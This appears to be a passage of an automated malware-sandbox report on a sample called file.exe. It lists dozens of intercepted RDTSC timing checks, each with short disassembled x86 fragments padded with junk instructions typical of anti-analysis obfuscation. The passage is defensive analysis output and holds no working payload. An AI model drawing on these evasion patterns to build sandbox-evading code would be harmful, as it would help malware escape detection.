                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113ACBB second address: 113ACC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113ACC5 second address: 113ACCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F08ED2385E6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113AE8C second address: 113AE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114A0BF second address: 114A0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1153559 second address: 1153571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2F2E8Ah 0x00000009 popad 0x0000000a push ecx 0x0000000b jns 00007F08ED2F2E86h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DE6C second address: 114DE8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385ECh 0x00000007 jc 00007F08ED2385E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F08ED2385E6h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DE8A second address: 114DE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160D6B second address: 1160D7A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007F08ED2385E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160D7A second address: 1160D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F08ED2F2E98h 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160D9B second address: 1160DA9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F08ED2385E6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1178D9B second address: 1178DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1178DA1 second address: 1178DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117905A second address: 1179060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1179060 second address: 1179067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1179067 second address: 11790BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 jnl 00007F08ED2F2E8Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F08ED2F2E93h 0x00000016 jno 00007F08ED2F2E86h 0x0000001c jmp 00007F08ED2F2E92h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F08ED2F2E8Dh 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11790BB second address: 11790DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F08ED2385E6h 0x00000008 jmp 00007F08ED2385F5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11796C5 second address: 11796D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007F08ED2F2E8Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CB22 second address: 117CB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CB26 second address: 117CB4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F08ED2F2E92h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CB4D second address: 117CB68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F08ED2385EAh 0x0000000a jng 00007F08ED2385E6h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117F6A7 second address: 117F6D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F08ED2F2E8Fh 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117F761 second address: 117F76B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117F76B second address: 117F7D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 jc 00007F08ED2F2E97h 0x0000000f pop edi 0x00000010 nop 0x00000011 add dword ptr [ebp+122D1E38h], edx 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F08ED2F2E88h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D2D67h], edi 0x00000039 movsx edx, si 0x0000003c call 00007F08ED2F2E89h 0x00000041 push ebx 0x00000042 jns 00007F08ED2F2E88h 0x00000048 pop ebx 0x00000049 push eax 0x0000004a pushad 0x0000004b push edi 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117F7D2 second address: 117F7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117F7DB second address: 117F801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117F801 second address: 117F805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117FAD1 second address: 117FB25 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F08ED2F2E92h 0x0000000f push dword ptr [ebp+122D1E24h] 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F08ED2F2E88h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov edx, ecx 0x00000031 push 9DDA0500h 0x00000036 jng 00007F08ED2F2E8Eh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E27 second address: 1180E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E33 second address: 1180E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E37 second address: 1180E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E3F second address: 1180E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E97h 0x00000007 jmp 00007F08ED2F2E8Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edx 0x00000010 jmp 00007F08ED2F2E8Dh 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E7A second address: 1180E88 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690E62 second address: 5690E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690E66 second address: 5690E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690E6A second address: 5690E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690E70 second address: 5690E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690E76 second address: 5690E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E0008 second address: 56E000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E000C second address: 56E0027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E0027 second address: 56E0085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2385EFh 0x00000009 or si, B2EEh 0x0000000e jmp 00007F08ED2385F9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F08ED2385F0h 0x0000001a and cx, 2A68h 0x0000001f jmp 00007F08ED2385EBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E0085 second address: 56E0089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E0089 second address: 56E008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E008D second address: 56E0093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670129 second address: 567012D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567012D second address: 5670136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670136 second address: 567018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F08ED2385ECh 0x0000000e jmp 00007F08ED2385F5h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F08ED2385F0h 0x0000001a and esi, 26479B78h 0x00000020 jmp 00007F08ED2385EBh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567018D second address: 5670191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670191 second address: 5670197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670197 second address: 56701AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56701AE second address: 56701B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56701B2 second address: 56701B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56701B8 second address: 56701BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56701BE second address: 5670207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F08ED2F2E8Fh 0x00000013 pushfd 0x00000014 jmp 00007F08ED2F2E98h 0x00000019 and esi, 03417A98h 0x0000001f jmp 00007F08ED2F2E8Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670207 second address: 5670236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08ED2385EDh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690AF9 second address: 5690AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690AFF second address: 5690B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08ED2385F5h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690B28 second address: 5690B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F08ED2F2E99h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690B5C second address: 5690B9B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F08ED2385F0h 0x00000008 adc si, 4928h 0x0000000d jmp 00007F08ED2385EBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F08ED2385F5h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690B9B second address: 5690BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E8Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569065F second address: 5690674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690674 second address: 5690691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690691 second address: 5690695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690695 second address: 5690699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690699 second address: 569069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569069F second address: 56906E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, edi 0x00000011 pushfd 0x00000012 jmp 00007F08ED2F2E97h 0x00000017 add esi, 0B953C7Eh 0x0000001d jmp 00007F08ED2F2E99h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690542 second address: 5690548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690548 second address: 5690586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 639B2DC3h 0x00000008 call 00007F08ED2F2E98h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F08ED2F2E97h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690586 second address: 56905DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F08ED2385EEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F08ED2385F0h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F08ED2385F7h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56905DE second address: 56905E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0240 second address: 56A0264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08ED2385ECh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0264 second address: 56A0269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0269 second address: 56A0288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, ax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F08ED2385F0h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0288 second address: 56A0297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0297 second address: 56A02AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0EE6 second address: 56D0EEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0EEC second address: 56D0EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0EF2 second address: 56D0EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0EF6 second address: 56D0F31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F08ED2385F1h 0x00000012 add si, E036h 0x00000017 jmp 00007F08ED2385F1h 0x0000001c popfd 0x0000001d mov ecx, 7A4D4027h 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0F31 second address: 56D0F39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B03D4 second address: 56B03E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EDh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B03E5 second address: 56B0403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0403 second address: 56B0409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0409 second address: 56B0429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0429 second address: 56B042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B042D second address: 56B0431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0431 second address: 56B0437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0437 second address: 56B043D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B043D second address: 56B0441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
